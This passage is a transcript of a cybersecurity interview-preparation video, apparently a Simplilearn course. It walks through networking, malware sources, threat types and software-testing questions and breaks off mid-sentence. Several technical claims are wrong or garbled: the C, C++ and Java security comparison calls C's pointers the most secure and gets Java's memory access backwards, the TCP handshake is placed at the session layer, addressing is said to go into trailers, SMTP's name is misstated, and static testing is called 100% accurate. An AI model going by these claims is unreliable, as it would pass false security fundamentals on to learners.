We are going to look at 10 different questions on networking. Then we'll have 10 more questions on software and programming, another 20 questions on operating systems and applications, 10 questions on cyber attacks, and then finally 10 questions on cryptography. So we're going to discuss over 50 odd questions, each in these different fields. which will help you crack your interviews as far as cybersecurity is concerned. Let's start off with networking questions. Let's start off with question 1. What is the OSI model? Explain the different layers of the OSI model. OSI largely is a theoretical model utilized to understand networking and how data packets are created and how they are being processed by a computer. This is normally used by the TCP/IP, the Transmission Control Protocol over Internet Protocol software suite. So OSI is known as the Open Systems Interconnection model. It is a reference model that describes how applications are going to interact via the computer network. There are 7 different layers that we need to understand. They are as follows. So in this diagram, there are these 7 different layers. We start up from the bottom. First is the physical layer, the data link layer, network layer, transport layer, session layer, presentation, and application. When such a question is asked in an interview, it is not only that we identify these 7 layers, explaining what the OSI model is in the first place, we then try to identify these 7 layers and we give a brief description about each and every layer. If there are any additional questions, they will come after this basic question. So let's start off with the physical layer. This is the lowest layer of the OSI model. Now this is where any and every physicality of your computer comes into the picture. So it could be a network interface card, it could be an RJ45 or a Cat5 cable, anything that allows data to be transmitted physically from your machine to another machine. Next comes the data link layer. So on the data link layer, as far as networking is concerned, we just need to understand that data packet is encoded, decoded into bits at this layer. This is also the layer that deals with MAC addressing. So the physical address of every network interface card, which is the MAC address, which is utilized to route data packets over the network. This is where the MAC address resides, on the data link layer. The next layer is the network layer. Here datagrams are transferred from one to another. The function of this layer are routing and logical addressing. The moment we talk about routing and logical addressing, IP addresses come into the picture. IP version 4, IP version 6. So network layer will deal with IP addressing and the routing of those packets. Then comes the transport layer. This is the layer responsible for end-to-end connections. That automatically signifies that this is where TCP and UDP will be working. TCP stands for Transmission Control Protocol, UDP for User Datagram Protocol. TCP is a connection-oriented protocol, whereas UDP is a connection-less protocol. These two protocols are utilized to establish connectivity between two machines. TCP is a more reliable method of connectivity because there are a lot of packets that are sent across to verify that the data has been sent, data has been received, and so on and so forth. Whereas UDP is a connection-less protocol where data is just dumped without verifying whether the receiver actually receives that data or not. So in a nutshell, on the transport layer, TCP and UDP make their appearance, and this is where that functionality lies. Then comes the session layer. This controls signals between the computer. It establishes, maintains, and terminates connections between processes. So in the transport layer, we talked about TCP and UDP. UDP being a connection-less protocol where data is just transmitted without verifying whether the receiver received that data or not. Whereas TCP, we studied, is more of a reliable protocol. Thus, there are different packets, signals that will be sent across to verify that data has been transmitted, it has been received properly, and then the next segment of that data is being sent. So those control signals are established using the session layer. So the three-way handshake of TCP, the acknowledgement packets, and those kind of packets will be taken care of on the session layer of the OSI model. Then comes the presentation layer. The presentation layer is responsible to translate data into the application layer format. So the formatting, right? MIME or encoding that is being utilized, the UTF-8 character set that we utilize for presentation, encryption mechanisms, all of these work on the presentation layer. And finally comes the application layer, where the application itself uses a particular protocol so that the other machine on the receiving end, the application on that machine will be able to understand what the communication was about, right? So in a nutshell, if I start from up top, the application layer will deal with any of the data that the application
is generating, so maybe a user input, you're logging in, you're typing the username, password, all that data will be constructed, let's say, into an HTTP or an HTTPS format. That's where your application layer comes into the picture. Then the formatting of which into UTF-8 and the encryption of which would be done at the presentation layer. Then this transport layer and the session layer would kick in to establish a TCP session, do the three-way handshake, establish that connectivity. IP addressing would be done on the network layer, MAC addressing would be done on the data link layer, and when everything is ready on the physical layer, the packet will be sent out. At the receiving end, the packet will be received on the physical layer, and then all these layers will be reversed, and finally at the application layer, the data would be presented to the application, who would then execute it and showcase it on the screen of the recipient. So this is the way you want to explain this question. You want to be very concise, precise about what you're explaining. You don't want to go into too hypothetical scenarios. You don't want to dilly-dally with the layers. You just want to give the basic functionality, want to demonstrate that you understand what the OSI layer is, how the computer functions, and you want to move on from there. If the interviewer has any further follow-up questions, they will ask those specific questions. So that's question 1. Moving on to the question 2. Question 2 is define unicasting, multicasting, and broadcasting. Now this is a question which can be very lengthy, but again, most of your interview questions are designed that way. It's basically to understand how much conceptually you are aware about these technologies. So you have to be very concise. Don't go rattling about technology too much, but in a concise manner, just try to explain what these things is. So when data is being transmitted over a network, it can be transmitted either in one of these particular manners. It can either be a unicast, multicast, or a broadcast. So what is unicast? Unicast is when a message is sent from a single user to a single receiver. So one to one, right? So one machine talking to another machine and nobody else. So also known as point-to-point communications. One point to another point. If you have to send information to multiple receivers, then you will have to send it using multicast, right? So this is where your multicast networking comes into the picture. So in our case, let's assume it's a network where there's a class C network, approximately 255 odd machines. And within these, there are two machines that want to talk to each other. If they want to talk between each other, it would be a point-to-point communication where they will utilize unicast, where only these two machines will have visibility of that conversation and the other machines will not even realize that this conversation is taking place. If one machine wants to talk to multiple machines, then the multicast comes into the picture. As the name suggests, in this mode of communication, data is sent from one or more sources to multiple destinations. Multicast uses the Internet Group Management Protocol, also known as the IGMP protocol, to identify groups. So under this IGMP protocol, various groups are created where machines are subscribed to those particular groups. And whenever a message needs to be sent through those groups, it will be identified by the IGMP protocol, and then that particular message will be sent to those multiple machines that are members of those particular groups. And then comes the broadcast. The third method is known as the broadcast. As it says, it is going to broadcast to all. So this is one to all, that is communication between a single user, and it is going to be sent to all the machines in that particular network, right? So the three ways: unicast is one to one, multicast is one to many, and broadcast is one to all. Then question number 3. What is DNS? DNS stands for Domain Name System. It is like the internet's phone book that is responsible for mapping the domain name into its corresponding IP address. And let me give you an example over here. Whenever we go and open up, let's say, a browser, a Google Chrome browser, we type in www.google.com and then we press enter, and magically Google comes in front of us, the website rather. Now, how does the computer know who Google is? Because as far as we are concerned, humans understand Google and words like that. Computers don't. Computers deal with binary, zeros and ones, right? And as far as internet is concerned, they will only deal with IP addresses and MAC addresses. So how does a computer know how to find google.com and where is it located? So the moment we type in the browser window, in the address bar, google.com, and press enter, a DNS query is generated automatically by the browser, where a packet is sent to our DNS servers asking what the IP address is. So in short, DNS resolves domain names to their corresponding IP addresses. There is a DNS server which will have this index, a database of all the domains associated with their IP addresses. If one particular DNS server does not have that information that you're looking for, it may query another DNS server who may have that particular response. So the first thing is, when you type in domain name, it gets resolved with the DNS. It identifies the IP address corresponding to that particular domain name, and thus allows the computer to route that packet to the particular server where that domain name resides. So in this scenario, if you look at the screen, on the local PC, you have typed in cybersecurity.com. There is a DNS resolution, that a query that goes to the DNS server. What is the IP of cybersecurity.com? The DNS server looks it up in its particular database. If it has the corresponding IP address, it will then respond back. The IP address is 172.17.252.1, after which the packet is sent off to cybersecurity.com. Moving on to question number 4. What is a firewall? Now, this is a very good question, and normally a very basic answer that I've ever heard is that a firewall is a hardware and a software firewall. But that's the functionality of a firewall. That is how you can install a firewall. But there are different types of firewalls, and there is a specific functionality that a firewall is created for, right? So a firewall is either a hardware or software, but its responsibility is for blocking either incoming or outgoing traffic from the internet to your computer. They secure a network. So essentially, the firewall will allow a connection to happen or disallow a connection to happen. It won't go beyond that. That's the basic functionality of a firewall. Okay, so based on the configurations that you have done, based on the rules that you have created on a firewall, it will then, based on those rules, identify whether some traffic is allowed in that network or some traffic is to be blocked from entering that network. So as the screen shows, the firewall rules will analyze whether the traffic is good. If yes, it will allow. If the traffic is bad, it will block the traffic and not allow that connection from happening in the first place. Now, there are a few common types of firewalls that also need to be included in the answer to this question. And the first one is a packet filtering firewall. These are the most common types that you will come across, which analyze packets and lets them pass through only if they match an established security rule set. Now here people do get confused when we say that we analyze packets. People think that these firewalls will analyze the contents of that packet, which is not correct. When a definition for a packet filtering firewall says that these firewalls analyze packets, it means that they are only analyzing the source and destination IP addresses, port numbers, and the protocols that are mentioned in those packets. These firewalls do not have the capability of deep packet inspection, or DPI as it is known. If that capability comes into the picture, you're basically looking at an intrusion detection system or an intrusion prevention system in today's world called as a next-gen firewall. Okay, so a packet filtering firewall essentially will only analyze data packets for its source and destination IP addresses, port numbers, and the protocol that is being utilized. It will then map that information to the rules that are there on the firewall, and based on those rules, it will either allow that connection to happen or disallow that connection from happening. The second type is a proxy firewall. These firewalls filter network traffic at the application level. So when you say application level, they work at the layer 7 of the OSI model. Packet filtering firewalls, since we have mentioned that they work on IP addressing and port numbers, will work on the network layer of the OSI model. Also on the transport layer, because they also look at protocols. Proxy firewalls will work at layer 7, which is the application layer of the OSI model, and will deal with application level protocols such as HTTP, HTTPS, FTP, SMTP, and so on and so forth. And the third one is a stateful multi-layer inspection firewall. These filter packets at the network, transport, and application layers. So they basically do the job of the first and the second type of firewalls. The packets are compared to known trusted packets. But now the first question is, if there is a stateful multi-layer inspection firewall, why do we have type 1 and type 2 firewalls like packet filtering and proxy firewalls? That is because that is how the firewalls have evolved. We started off with the packet filtering, then we added functionality to it, and so on and so forth. So if a question comes, what is a firewall? You start off with the option saying it is a hardware or software. This is the responsibility, the functionality of a firewall is to allow good traffic and disallow bad traffic based on the rules that have been configured on the firewall. And then you've got basically 3 types of firewalls: packet filtering, proxy, and stateful multi-layer, and just include a brief description of each of these firewalls.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Then moving on to question number 5, what is a VPN? VPN is also called a virtual private network. It is a connection between a VPN server and a VPN client. So it basically creates an encrypted tunnel between the client and the VPN server, which is then utilized to secure the connections that you're making with the internet. So as you can see in the diagram, the user has a VPN client installed on their machine. The VPN client then creates an encrypted tunnel to the VPN server, and through this tunnel, encrypted data is transmitted, which can then be processed by the VPN server, sent to the internet. Information can be received back by the VPN server. The VPN server will encrypt that data back and send it back to the user. So if there is a man-in-the-middle attack that is happening, or a hacker trying to eavesdrop on the communication mechanism, they will not be able to do so because of the encrypted tunnel. It is very difficult to decrypt this or hack through this encrypted tunnel. It is possible, but it is very difficult to achieve that. Moving on to question number 6, what are the advantages of distributed processing? Now, before we go into advantages of distributed processing, we first have to understand what is distributed processing. So it is a term which describes various computer systems that use more than one processor to run an application. Here, multiple computers across different locations share the same processor. The advantages of distributing processors are as follows. But before we go into the advantages, distributed computing is basically where multiple machines will pool their resources together to run a singular application. So an application that has multiple resources and can scale up and scale down as and when required. The advantages are that it can be very useful in data recovery. For example, RAID, where you're striping data on various hard disks. It is reliable, it is cheaper, lower cost can be achieved, and it is easy to expand because of the scalability factor that we just talked about. If there is loss of data in one computer, it can then be recovered by another interconnected computer. And one of the examples would be blockchain in today's world, right? What is blockchain? That this data is created live and stored on a connection of computers. So if one of the computers goes offline, the other computers in that network will still have that data, and the blockchain will still function without any issues. The second point, a glitch in one machine does not affect the processing, as there will be multiple other machines like we discussed in the blockchain. Several cost-effective mini computers are used instead of costlier mainframe machines. So instead of having a server bank, I can have multiple machines interconnected together, and they can function in that particular blockchain or for that particular distributed processing mechanism. Depending on the amount of data processing, more computers can be attached to the network. Thus, you can increase the number of computers that can be a part of that blockchain, or you can reduce them as and when necessary. Moving on to question number 7. What is TCP/IP? TCP/IP, or Transmission Control Protocol over Internet Protocol, is a set of communication protocols that are used to interconnect networking devices on the internet. This protocol defines how data should be transmitted over the internet by providing end-to-end communications. So essentially, if you want networking to be established on your machine, you will need TCP/IP. Without TCP/IP, there will be no work groups, there will be no domains. Basically, your interconnectivity will go for a toss. TCP/IP is a software that once installed on your machine will then interact with the hardware, which is your network interface cards, and then your switches, wires, cables, and all those, through protocols that have been already pre-configured in it. So within the TCP/IP suite of softwares, you will have all the protocols, all the functionality of the OSI layer, and each and every protocol that works on each and every layer will be predefined and pre-configured to work in a particular manner. The Internet Protocol is all about routing each individual packet to make sure it reaches its destination. So with the TCP, you're talking about the protocols that will allow you to format the data and generate it so that you can communicate it over the network. The IP will then deal with the routing of those packets so that the packet can be routed to the correct computer and be received by the recipient. So the TCP/IP model is the compressed version of the OSI model. The 7 layers will get converted into 4 layers: the network access layer, internet layer, transport layer, and application layer. Going on to question 8. What do you mean by ipconfig and ifconfig? Both of these are commands, the first one on a Windows machine, the second one on a Linux machine. So ipconfig is known as the Internet Protocol Configuration. This is a command that is used on the command line interface of Microsoft Windows to view all the adapters and the configuration of each and every adapters for their network interfaces. So as you can see on the right hand side in the command prompt screen, if once you type in the ipconfig command on the C prompt and press enter, it will give you a list of all the adapters that are there. So you can see wireless LAN adapter, local area connection, the media is disconnected, it doesn't exist. At the bottom you will see the Wi-Fi connection, wireless LAN adapter, and it can give you the IP version 6 IP address, IP version 4 address, the subnet mask, and the default gateway. So this is the configuration that allows the machine to know on what network it is on, what is the default gateway for communicating to the internet, what is the subnet mask, so how many computers may exist in that particular network, and what is the IP address of that specific computer so that it can communicate across the network as well. ifconfig is the same thing on a Linux, Mac, or Unix operating system. So the command will also give you the list of interfaces and the configuration of each and every interface. It is used to configure, control the TCP/IP network interface parameters from the command line interface. It allows you to see the IP address of these network interfaces. So here you can see the WLP19S, the IP address being 192.168.43.215, subnet mask being 255.255.255.0, with the broadcast being 192.168.43.255. Question 9. What is the difference between a domain and a work group? This can be a very interesting question and can be a very lengthy question at the same time. A work group is nothing but a decentralized network where you have interconnected multiple machines together and each machine acts in its own individual capacity. Thinks of itself as a server, right? So a decentralized network, every user manages the resources individually on their PC. So local users on their own PCs managing the network shares, what can be shared from that particular machine, what data should be shared, should not be shared, to whom it can be shared with, and so on and so forth. It is good if you've got a small network, a few machines altogether, and you want them to interact with minimal management effort, right? So each computer, each user will decide what they want to allow other users to see on that particular network. And all of them would be connected over a LAN, a local area network, either a wireless or a wired one. So if you look at your home Wi-Fi right now, that is one of the best examples of having a work group. The domain, on the other hand, is a centralized network model. So in a corporate environment, whenever you go there and you got a domain-based username and password, which when entered onto a particular machine gives you access to the entire network or whatever applications and whatever resources have been allocated to you, that is where the domain comes in. So it also uses a single sign-on mechanism for all the resources that are to be made available to you. Whereas in a work group, you're a local user only meant for that particular computer, right? So coming back to the domain, it is an administrator who's going to manage the entire domain and all of the resources connected to the domain. The resources could be switches, routers, servers, data stores, applications, web servers, mail exchange servers, and so on and so forth. So all of these are administered by an administrator through the domain. It is the most reliable and the optimum solution for a large network where multiple users are going to interconnect and share that data amongst each other, right? The computer can be connected to any network. That means you can be on the internet, and through the internet using a VPN, you can connect to your corporate network, authenticate in, and get access to whatever resources you are allowed to access. Whereas in a work group, you have to be a part of that network to access that particular network. If you change your location, you go and connect to another Wi-Fi, you will lose access to your previous Wi-Fi. Then the last question for the networking section, what is data encapsulation in networking? Data encapsulation refers to the process of adding headers and trailers to the data. The data link layer binds each packet into a frame that contains the hardware address of the source and the destination computer. So in this example, when you're talking about data encapsulation, we have talked about how data that has been created by the application layer would have a header and a trailer that will give the various informations of where that data needs to be sent. So the hardware address, which is the MAC address, comes into the picture and gets added to the header, and the IP addresses, port numbers, and all of those things would then be added to this trailers as well, so that the data can be then routed to the intended recipient of that particular communication. With this, we end the first 10 questions in networking, and in this video we are going to look at software and programming. So we're going to look at the first 10 questions. First question being, how do you keep a computer secure? Now this is going to be a very generic question, so you want to put your best foot forward and you want to identify the most common methodologies on how you can keep a computer secure. So when we talk about computers, the first thing that you want to talk about is authentication mechanisms, where you want multi-factor authentication or two-way authentication to ensure that your accounts are kept secured. Now, if you look at using passwords, depending on how passwords are being stored by the application, password attacks can be possible, either a brute force attack or a dictionary-based attack, or even password guessing attacks are possible. To mitigate those kind of attacks, we need multi-factor authentication to ensure that accounts are kept secure. Now, even if we are using multi-factor authentication, we also want to look at secure passwords, which means that the password is complex enough to withstand most of the common attacks, and a brute force attack or a dictionary attack is just not possible. So we want to randomize our passwords. We want to create a complexity where a password meets standards such as has at least one lowercase, one uppercase character, has numerics and special characters, and is randomized, is not based on a dictionary word, doesn't contain usernames, email addresses, phone numbers, or anything that is personal to that particular user. Third, keep regular updates, which means that there will be patches that will be released for the application, for the software that you're utilizing. Download the patches, install them on a regular basis to ensure that you are secured against the most recent attacks that have been identified. Install a good antivirus. Could be an internet security suite, which will have an antivirus, intrusion detection system, a firewall, and will help you protect yourself against ransomwares, malwares, and any script-based attacks. Also have a specialized firewall on your system. Could be a host-based firewall or a network-based firewall to ensure that attacks are kept at a minimum, and you have your network definitions in place to allow or disallow connections from happening to your devices. Have anti-phishing softwares installed as well to ensure that you are not getting any spam mails. Even if you do, you're able to identify that and not fall prey or victim to those spam mails. Phishing attacks are generic, where they are directed towards individuals and they prey on the gullibility of that particular individual. So our Nigerian frauds, or the lotteries that we win on a regular basis of hundreds of $millions, those messages, the emails that we receive, they are all phishing emails where they're basically prone to victimize the user and then rob them of money, or install some malware, or do some other malicious activity. If you want to enhance encryption about data that you have stored on your devices, or on your or that is accessed by your software or being transmitted by your software, use encryption. Encrypt your data, whether it is at rest, whether it is in motion, or whether it is at use, thus reducing data leakage and data loss possibilities. And finally, and the foremost, secure your DNS. DNS is the domain name server, which is utilized by computers to resolve domain names to IP addresses. If a DNS poisoning attack is possible, where your DNS settings have been modified by an attacker and you're redirected to a malicious DNS server, that server is going to redirect you to another malicious application which may have a malware or a malicious software as a payload. Also, you don't want people to know your DNS servers and the queries that you're making, so you want to use secure DNS or DNS over HTTPS to encrypt your DNS queries as well. So, in a nutshell, if you follow these 8 steps, your devices, your computers, your applications
are going to be as secure as possible. The next question, discuss security related aspects between C, C++, and Java. Now this is an open-ended question. It depends on which level you're giving an interview on, but we're looking at it from a fresher's perspective or a less experienced perspective. And thus, these are some of the aspects that we want to look at and the comparisons between C, C++, and Java. So the 5 aspects that we are looking at are pointers, code translations, storage allocation, inheritance, and overall security based on C, C++, and Java. So when we say pointers, we are looking at how we are going to, we are using pointers and stacks and heaps to point to functions, and how we exit those functions, and how those functions are then recalled into the next function. So C supports pointers, it is most secure. C++ also supports pointers, but it is a little bit less secure than C. Java, it is not supported. Direct access is given to memory allocation, and thus it is the least secure as far as pointers are concerned. When we look at code translations, C is able to compile, but it is not secure. Same with C, C++, but in Java it is an interpreted language and it is abstracted and secured. In storage allocation, in C we use malloc and calloc memory allocation, which is less secure because it does not have internal checks on verifying what memory is allocated and the user input that is being compiled or that is being input to that memory, right? Thus, this can allow buffer overflow errors to creep in because of the non-verification of the input data. So it is the least secure. In C, C++, it uses new and delete options and is comparatively secure, but Java uses a garbage collector and thus is the most secure as far as storage allocation is concerned. When we talk about inheritance, the most secure is C, C++. C has no inheritance, so it's not secure. In C++, it is supported, thus it is the most secure. Whereas in Java, there is multi-inheritance that is not supported and thus is comparatively secure. Overall, the most secure out of all these based on these 5 aspects is Java. The least secure is C, and the mid-level is C++. Moving on to question 13. What are the different sources of malware? Now, malware stands for malicious software, right? Malware is basically a software that poses as a legitimate software but has a payload of a Trojan, virus, spyware, keylogger, or some malicious software that is going to have a negative impact on security of your particular device. So the question here is, what are the different sources of malware? We want to identify the most common sources through which malwares infect end user devices in today's world. And we can start with pop-up ads. So most of the websites, if you're visiting untrusted sites, if you're being redirected to sites that you don't know about, there will be a lot of pop-ups coming your way where it says you're the 1 millionth visitor to this site. Please click here to download your gift. Or it will say, congratulations on winning a particular product for visiting this page, and so on and so forth. There are some instances where you can see a banner which is flashing at you on top of the page and says that there are 8 infections that have been identified on your computer. Click here to download an antivirus to clean the infections. So all of these pop-ups are there as a social engineering attack, as a phishing attack, to make gullible people click on those links and download those malwares. Now the software that is posing as a security software itself can be a malicious software which is going to install a Trojan or a virus or a bot on your machine, compromising the security of that machine. The second is removable media, USBs. And humans have a fascination with USBs. So if you find a USB lying around, it's a free USB, you get excited about it and you want to take it home, you want to plug it into a machine and see what's on the USB. Worst case scenario, you format it and you got a free USB to utilize. Higher the capacity, the better. But that is one of the most easiest way people use malwares to be deployed on unsuspecting users. If there is a USB lying around, why would somebody want to forget a USB? It's most likely planted over there as a social engineering attack so that a gullible person is going to pick it up, plug it into their device. If the device is not secured enough, it is going to install the malware, right? Then documents and executable files. This is where your viruses and all those creeps in. So let's say you're surfing on the internet, you're looking for a software, and you find the software on a particular website. You do not verify the trustworthiness of that site, and you just download and install that software. Now that software could be malware as well. Thus, if you're surfing on the internet, you're downloading files from different locations, you have to research the website, you have to research the source to ensure that it is trustworthy, and only then are you going to download and execute those files. Thus, internet downloads as well. And when we say internet downloads, it's not just untrustworthy sites. We go to torrents, we go to the dark web or the deep web, and we are searching for other softwares, especially those who are researching security, right? We are always on the lookout of new softwares, and we are always on those forums which may not be so much trustworthy, and we just download those files and start installing them. That is a very bad scenario, right? So you have to be very careful what you're downloading from the internet. Your antiviruses, your anti-phishing mechanisms, your threat intelligence mechanisms, have those mechanisms installed, and you want to verify where your downloads are coming from. Then your network connections. If it is a P2P connection, it is a local area network connection or a metropolitan area network, you have to verify which devices are connected to your machines, and you have to validate those connections before you want to trust those devices and before you connect to them. If you're on a public Wi-Fi, you probably don't want to connect to a public Wi-Fi in the first place. Then comes email attachments. There are so many attachments that come across in today's world, most of them in a zip format or a RAR format. Some of them come as document files where there are macros hidden within them. Macros are scripts that are recognized by Microsoft Office files, right? And then finally, there are these malicious advertisements that we find online, right? Let it be Facebook, let it be WhatsApp, let it be any social media platform that you go, or even your search engines. Their job is to display ads. Their job is not to verify whether the ad is legit or not. It is for us as consumers to be careful and validate that ad and verify whether it is a genuine ad or not. So just don't start clicking on any of the ad, trusting the platform that you're on. Be sure that you are investigating that ad. So these are the most common sources of malware, and the end user will always get infected by one of these mechanisms. Moving on to question 14. How does email work? Now, this is a very, can be a complex question, but we have to keep it as simple as possible. And we have to identify that there are two servers, both of them either using SMTP, which is the simple message transfer protocol, where in this scenario, John wants to send an email. Thus, they've got an email client installed on their machine, which is connected to the mail exchange server, which has a DNS server which maps the routing and which maps the exchange server and inboxes. So when John composes that message and clicks on send, John should be connected to a mail exchange server where the email is sent through that particular person's inbox. So John's inbox will then be validated, and that email will then be sent through the DNS server through the internet and will be received by the recipient mail server. So at this point in time, John also requires the recipient's email address. So in this case, this is Jack. So jack@something.com would be the email address. So while John is composing, the to field will have Jack's email address. The from field will have John's email address. The subject field will have whatever they want to convey as a message. The message body will have the message itself. And then when John clicks on send, it will go to their exchange server. The exchange server will then validate the inbox and identify where that inbox is located for Jack. And then through the internet, it will be sent to the mail server of Jack. The mail server will then identify the proper inbox that email needs to be sent to, and it will store that email in that particular inbox. When Jack opens their computer and accesses their inbox, this email from John will be already waiting for them, and they can respond to it the same way John had sent that email.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
Moving on to question 15. what are the types of threats a company can face, right? And this is where your threat modeling comes into the picture. So you're looking at softwares, you're looking at operating systems, and the company comes and asks you, what are the threats that are most likely that a company will face? So on a broader scale, the threats that a company will always face would be classified as natural threats, man-made threats, technical threats, and a supply system threat. So a natural threat would be an act of God which is outside the control of human beings. Could be storms or any natural occurrences like volcanoes, thunderstorms, flooding, earthquakes, fire, and so on and so forth. So anything that is natural. So it depends on the geographic location that you're in and what kind of climate that area faces, and you need to identify the immediate threats and prepare for them. So if it is flooding that you're looking at, and you want to look at an office, and the possibility of the office getting flooded is real, you probably want to take office at a higher floor so that the threat of flooding is minimized. For fire, we always have a fire drill where we practice our fire mechanism so that we can evacuate all humans as soon as possible and then worry about the technicalities of it. Under any circumstances, under any threats, humans will always have the first priority, and then everything else comes in. Man-made threats are where man themselves are a problem. So strikes, lockouts, hackers, theft, war, rioting, all of those are man-made threats, which we ourselves cannot be in control of, but we need to plan for them, and we need to have a business continuity plan or a disaster recovery plan for any of these threats that have been identified. Then come the technical threats. Technical could be software bugs, operating system bugs, application bugs that come with the applications that we have, or a hardware failure where a server crashes, a hard disk crashes, maybe the processor stops working, the motherboard stops working, RAM gets corrupted. Any of the technical aspects stop functioning, thus creating a break in the business, can come under technical, right? So anything to do with computers, let's say a server failing or a patch that is not installed on a particular software, those would come under technical threats. And then the supply system. The supply system are your environmental threats which depend on your supply chain failures. What is the supply chain? For an office to function, there are a lot of dependencies that an office goes through, right? There are a lot of other vendors that support and provide critical infrastructure, non-critical infrastructure for the office to function. For first and foremost, electricity. Without electricity, nothing is going to be powered on, and you're not going to be able to function. So if there is an electricity service provider, and if there is an electric outage, that comes under supply system. So that's a supply chain failure where the vendor that provides electricity to you has failed in providing that particular service, and now you need a business continuity or a disaster recovery plan. So you probably have an inverter, or you already have a power generator plant that is going to generate your own power and supply it to your system, right? There could be short circuits because of fluctuation in the electricity. Maybe the internet service provider fails and your internet crashes, so you have a backup line for the internet from a different vendor, right? And so on and so forth. Maybe your hardware vendors who are supplying you servers, desktops, laptops and whatnot, they fail because they are facing a strike or they go bankrupt, and suddenly you can no longer purchase hardware from your vendor because they no longer are in business. So that's a supply chain failure. So any of these systems failing would also come under threats. So under a broad category, these are the first 4 threats that you need to identify, and then you can elaborate by providing more scenarios based on the experiences that you have had towards each and every of these threats. So a natural threat where you may have had experience where there would have been, let's say, a flooding or any natural disaster which caused a problem for the continuity of your particular business. So identify each and every example for each of these threats and provide that as an example in the interview. What is black box and white box testing? So when you are testing a software or you're testing your infrastructure, there are 2 different tests that you can conduct. The first one is a black box. The second one is a white box. In a black box test, there is no knowledge that is shared with the tester. So let's say you're an ethical hacker and you have been awarded a contract by an organization to test their current application that they have developed. Now, they are not going to give you any information. They are not going to tell you what the application is. They just probably give you an IP address and a port number where the application is hosted. And now you have to fire in your own queries and try to figure out what the application is, try to gather information, see what information can be gathered in the first place. And based on that, you're going to figure out your way, identify vulnerabilities, and see if any of those vulnerabilities can lead to an security incident. So without any knowledge, zero knowledge of the IT infrastructure or the source code, that's a black box attack or a black box test. A white box test, on the other hand, is where full knowledge of the IT infrastructure or the source code is shared. So the ethical hacker has complete knowledge, and based on the knowledge, they are then going to test out the system to see if there are any flaws that they can identify, right? So why would these two audits be important? Because the first one, a black box audit, emulates the attack of an outsider, an external hacker sitting outside the organization trying to figure their way in. Whereas a white box attack can emulate the attack of an insider. So a disgruntled employee within that organization misusing their access controls or their access rights to make unvalidated profits, right? So somebody who's corrupt, who has been bribed, who wants to sell out company secrets so they're going to try to find out vulnerabilities, try to steal data and try to sell it on the gray market, right? So a white box would emulate an internal attack, a black box would emulate an external attack. Moving on to question 17, what is use case testing? Now, use case testing is a functional test and it is also a black box test, right? What is a functional test? It tests the functionality of a particular software once it has been created. Why is it a black box test? Because the user doesn't know what the functionality is. They just want to find out each and every scenario and try to see what that scenario generates as a response. They are not sure whether that is the appropriate response that should be generated or not. They're just trying to find out the response that is going to be generated after they fire off a query. So this technique is used by testers to get the test scenarios to exercise the whole system from start to finish. So let's say it's a login mechanism for an application, right? Now, a user at this point in time, the tester, since it's a black box testing, will know that it is a login mechanism. They will not know the details of what logging mechanisms are being utilized. So they wouldn't know whether input validation is done. They wouldn't know whether output encoding is done. They wouldn't know how the CGI calls are being made. They will not know how the queries are handled at the server side and how the database is going to treat that particular query. So they have no idea whether SQL injection attacks are possible and so on and so forth. So for them, with whatever input they are going to try to insert for that login mechanism, that's a functional black box test. The functionality being whether the login mechanism works, and based on the type of inputs that they're going to put in, whether it creates an unwarranted output, whether they can bypass the mechanism or they can hack into the system because of some of the flaws that were left behind, right? Another example here is a software made for users to use for documentation. The testers will test all the cases that the user can do. So can the user view a document? Can they add new documents? Can they edit documents? And can they delete documents? So this functionality will depend upon the access controls that have been granted to a particular user. So for this particular user, the tester at this point in time, they would not know whether they're an administrative user or they're a regular user. They'll just try to do all of these and then write the responses saying, I was able to view, I was able to add, I was able to edit, and I was able to delete. Now the result will be then sent to a manager. The manager will look at the results and then based on the actual access controls that were supposed to be there for this particular user, then we'll try to identify whether this is an acceptable case or whether there were any flaws within this case. Moving on to question 18. What is static and dynamic testing? Now this is again in application testing. Static testing is done in an early stage of development lifecycle. Now, software development life cycles, there are multiple of those. What are these life cycles? There are different stages in which an application is created and provided to the customer. So your first stage would be determining the scope of the application, determining the hardware requirements for that application, then creating a flow chart for that application, a functional chart for that application, and then maybe start coding. Then an architect comes in, tests the code, verifies the code,
then the testing phase comes in, then the security testing phase comes in, and then the user acceptance testing comes in. But in every stage, at the very earliest of all stage, a static test will always be started to see whatever code has been developed, whatever scope has been developed, whether that scope is going to be correct or not. This will include walkthroughs and code review. What is a walkthrough? A walkthrough is going through documents that have been generated and trying to find faults in the documented journey that has been created so far. So let's say somebody has created a workflow or a flow chart for a program, how the functions are going to be called and how they're going to be executed. So a walkthrough would be where all these responsible people will walk through that particular flow chart and find out any flaws within that and then rectify them. If there is any code that has already been written, this code will be reviewed manually and any flaws within that code would then be identified. Static testing will always be 100% accurate in a very short amount of time because it is immediate. You have created it and then the expert is going to test it to see whether everything is fine or not. Right? It is all about prevention mechanism. So since you're doing it at the inception itself, if you find any flaw, it gets immediately repaired. So this is about preventing vulnerabilities from creeping into that application at a later point in time. Whereas dynamic on the other side is done at the end of the development lifecycle. So you have generated the application, everything is ready. Now you want to do dynamic testing. Includes functional and non-functional testing. Functional testing is where the application itself is being tested, the functions to see that all the parameters that are given to the application are functioning properly. Non-functional testing would be where security parameters, administrative parameters, all of them are being verified, right? This is where your test case scenarios come in, and you're going to test each and every scenario by generating inputs and analyzing the output that the application is going to give you. Dynamic testing is all about cure. So here you're going to identify vulnerabilities, report them to the management, and the management is then going to figure out a way of patching those vulnerabilities so that they can be mitigated. Moving on to the next question, what are the test levels in software testing? So as far as software testing is concerned, there are 4 test levels: module testing, integration testing, system testing, and the final one is acceptance testing. So in the testing phase of your development lifecycle, the first thing is a module test. You're going to check your routines, your subroutines, your subprograms, procedures that have been written in a program. So all your functions, all your mechanisms for that application are going to be tested. When you go into integration testing, the software may have been integrated with multiple softwares. There may be different API calls coming in, maybe a third-party software on which you're depending upon to supply for information. So all of these integration of various softwares, various APIs are tested to ensure that they are functioning properly and there are no flaws, errors, or mistakes left behind in the integration of all of these softwares. Then the system testing is where the entire system, so including the hardware, including the software, right? It starts from the installation. So now the software is complete. We know which hardware we are going to support for it. We start by installing the software and see whether the installation is going to be completed properly, if there are any errors in the installation process itself. Then once it is installed, the performance of that particular application, the write speeds, the read speeds on the hard disk, the transaction speeds that the application is capable of, the network dependencies that the application may have, all of those would come under system testing. And then the acceptance testing, which is basically a quality assurance exercise that the application meets the client's requirements. So the client in the first stage would have given the scope of what needs to be achieved. In the 